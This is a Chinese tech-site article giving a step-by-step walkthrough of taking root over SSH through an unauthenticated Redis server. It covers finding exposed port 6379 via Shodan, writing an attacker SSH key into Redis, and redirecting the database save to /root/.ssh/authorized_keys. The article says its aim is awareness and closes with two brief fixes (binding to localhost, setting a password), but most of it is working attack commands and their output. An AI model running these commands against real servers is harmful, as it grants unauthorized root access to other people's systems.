新闻资讯  快讯  焦点  财经  政策  社会
互 联 网   电商  金融  数据  计算  技巧
生活百科  科技  职场  健康  法律  汽车
手机百科  知识  软件  修理  测评  微信
软件技术  应用  系统  图像  视频  经验
硬件技术  知识  技术  测评  选购  维修
网络技术  硬件  软件  设置  安全  技术
程序开发  语言  移动  数据  开源  百科
安全防护  资讯  黑客  木马  病毒  移动
站长技术  搜索  SEO  推广  媒体  移动
财经百科  股票  知识  理财  财务  金融
教育考试  育儿  小学  高考  考研  留学
您当前的位置:首页 > IT百科 > 安全防护 > 黑客

利用Redis黑进目标系统

时间:2019-08-16 16:14:30  来源:  作者:

本文旨在让大家注意加强redis的安全,不要去尝试黑别人

在尝试黑进系统之前,我们先来看一下,通过网络空间的搜索引擎,查看全球内暴露在公网中的6379(Redis默认端口)或27017(默认端口)端口号:

利用Redis黑进目标系统

 


利用Redis黑进目标系统

 

ZoomEy不行就用:https://www.shodan.io/search?query=6379

下面我就准备两台服务器进行测试:

10.99.73.7(测试机)

10.99.73.11(攻击目标)

1、测试能否连接到远程主机的redis

$ redis-cli -h 10.99.73.11 -p 6379

10.99.73.11:6379> KEYS *

(empty list or set)

能够看到我链接成功,并且能够使用命令进行正常操作;其实只要能到这一步,基本就已经算成功入侵了。

2、然后将公钥文件内容,写入目标主机的redis

生成自己的公私钥,输入ssh-keygen命令,一路回车

修改id_rsa.pub文件,在文件开头和结尾多添加回次车(最好两次不要多也不要少),必须要加,不然这个公钥过去之后无法使用。

写公钥进redis

$ cat /root/.ssh/id_rsa.pub | redis-cli -h 10.99.73.11 -p 6379 -x set ssh-key

OK

此时,我们再次连接目标主机的redis查看内容,公钥已经写入了目标主机redis

利用Redis黑进目标系统

 

3、将公钥文件写入目标主机上

我们用config命令,分别设置redis写入日志的文件名和目录

10.99.73.11:6379> CONFIG SET dir /root/.ssh

OK

10.99.73.11:6379> CONFIG SET dbfilename "authorized_keys"

OK

10.99.73.11:6379> save

OK

4、验证

使用ssh登录目标主机,此时,已经成功获取linux系统的root账户权限,进入目标主机。

利用Redis黑进目标系统

 

原理

利用redis可以记录日志的能力,将日志写入root用户的.ssh中,从而实现root账户针对攻击者免密登录的权限;

那么有攻击就要有防守,我们应该如何防范这种攻击呢?

方案有两种:

方案1:配置文件中设置允许登录的客户端IP地址:

如: bind 127.0.0.1;

方案2:客户端有密链接服务器 :

如:config set requirepass “password”



Tags:Redis   点击:()  评论:()
声明:本站部分内容来自互联网,内容观点仅代表作者本人,如有任何版权侵犯请与我们联系,我们将立即删除。
▌相关评论
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
▌相关推荐
Redis没有直接使用C语言传统的字符串表示,而是自己构建了一种名为简单动态字符串(simple dynamic string, SDS)的抽象类型,并将SDS用作Redis的默认字符串表示。...【详细内容】
2019-12-26   Redis  点击:(1)  评论:(0)  加入收藏
单机的 redis,能够承载的 QPS 大概就在上万到几万不等。对于缓存来说,一般都是用来支撑读高并发的。因此架构做成主从(master-slave)架构,一主多从,主负责写,并且将数据复制到其...【详细内容】
2019-12-26   Redis  点击:(1)  评论:(0)  加入收藏
连接数据库$redis = new Redis();$redis->connect('127.0.0.1',6379);//链接redis服务// 参数// `host: string`,服务地址// `port: int`,端口号// `timeout: float`...【详细内容】
2019-12-25   Redis  点击:(3)  评论:(0)  加入收藏
添加maven依赖,使用springboot2.x版本 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-redis</artifactId> </dependenc...【详细内容】
2019-09-26   Redis  点击:(1)  评论:(0)  加入收藏
Redis的 list 数据结构常用来作为 异步消息队列 使用,使用 rpush/lpush 操作 入队 ,使用 lpop/rpop 来操作 出队 > rpush my-queue apple banana pear(integer) 3> llen my-qu...【详细内容】
2019-12-25   Redis  点击:(1)  评论:(0)  加入收藏
作者:GrimMjx目录 开发语言 纯内存访问 单线程 非阻塞多路I/O复用机制前言Redis是一种基于键值对(Key-Value)的NoSQL数据库,Redis的Value可以由String,hash,list,set,zset,Bitmaps...【详细内容】
2019-12-19   Redis  点击:(1)  评论:(0)  加入收藏
前言Redis 是如今互联网技术架构中,使用最广泛的缓存。支持复杂的数据结构,支持持久化,支持主从集群,支持高可用,支持较大的value存储... 同时, Redis 也是中高级后端工程师技术面...【详细内容】
2019-12-25   Redis  点击:(5)  评论:(0)  加入收藏
为什么要在 Java 分布式应用程序中使用缓存?在提高应用程序速度和性能上,每一毫秒都很重要。根据谷歌的一项研究,假如一个网站在3秒钟或更短时间内没有加载成功,会有 53% 的手机用户会离开。...【详细内容】
2019-12-23   Redis  点击:(1)  评论:(0)  加入收藏
一、Redis雪崩、穿透、并发等5大难题解决方案缓存雪崩数据未加载到缓存中,或者缓存同一时间大面积的失效,从而导致所有请求都去查数据库,导致数据库CPU和内存负载过高,甚至宕机...【详细内容】
2019-12-19   Redis  点击:(13)  评论:(0)  加入收藏
本篇主要讲述如何使用基本的注解 @Cacheable @CachePut @CacheEvict 操作缓存1.我们导入Redis的依赖<!--这里Redis我给了版本--> <dependency> <groupId>org.springframewor...【详细内容】
2019-12-18   Redis  点击:(9)  评论:(0)  加入收藏
知识点 基于 Server-Sent Event 工作方式,Web 即时通信 Redis 包 发布订阅功能的使用 flask 快速入门,常用对象实例方法函数 Vuejs 列表页面自动渲染效果图 代码段 app.py 主...【详细内容】
2019-12-13   Redis  点击:(11)  评论:(0)  加入收藏
之前本人在找工作面试时在Redis相关问题上可栽了跟头。在面试前按常规套路准备了一下,比如 Redis 的常用5种数据结构,Redis持久化策略,Redis实现分布式锁,简单发布订阅等等都准...【详细内容】
2019-12-12   Redis  点击:(10)  评论:(0)  加入收藏
Redis在国内各大公司都很热门,比如新浪、阿里、腾讯、百度、美团、小米等。Redis也是大厂面试最爱问的,尤其是Redis客户端、Redis高级功能、Redis持久化和开发运维常用问题探...【详细内容】
2019-12-11   Redis  点击:(16)  评论:(0)  加入收藏
前言当结束Java和数据库的学习以后,你就会接触到Redis这个词,我第一次听到的时候脑海里就会浮现这两个问题:什么是Redis?为什么我们要用Redis?我了解完以后,写出来帮助大家能够更...【详细内容】
2019-12-10   Redis  点击:(12)  评论:(0)  加入收藏
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis是一个高性能的key-value数据库。Redis的出现...【详细内容】
2019-12-10   Redis  点击:(15)  评论:(0)  加入收藏
SCAN cursor [MATCH pattern] [COUNT count]SCAN 命令及其相关的 SSCAN 命令、 HSCAN 命令和 ZSCAN 命令都用于增量地迭代(incrementally iterate)一集元素(a collection of...【详细内容】
2019-12-09   Redis  点击:(13)  评论:(0)  加入收藏
redis事务任何数据库都要有一套自己的事务控制机制,redis事务是一次可以执行多个命令,它的本质是一组命令的集合。一个事务中所有的命令都会被序列化,在事务执行的过程中会按照...【详细内容】
2019-07-16   Redis  点击:(10)  评论:(0)  加入收藏
一、Sentinel介绍Sentinel是Redis的高可用性(HA)解决方案: 由一个或多个Sentinel实例组成的Sentinel系统可以监视任意多个主服务器,以及这些主服务器属下的所有从服务器,并在被...【详细内容】
2019-12-06   Redis  点击:(17)  评论:(0)  加入收藏
key 操作 删除 key:del key 批量删除key:redis-cli -a(密码)keys “QXJ_*”| xargs redis-cli -a(密码)del 查看所有的 key(一次性遍历整个数据库,生产上慎重使用):keys [pattern] 利...【详细内容】
2019-12-04   Redis  点击:(14)  评论:(0)  加入收藏
Redis 是内存数据库,数据都是存储在内存中,为了避免进程退出导致数据的永久丢失,需要定期将 Redis 中的数据以数据或命令的形式从内存保存到本地磁盘。当下次 Redis 重启时,利用...【详细内容】
2019-12-02   Redis  点击:(15)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条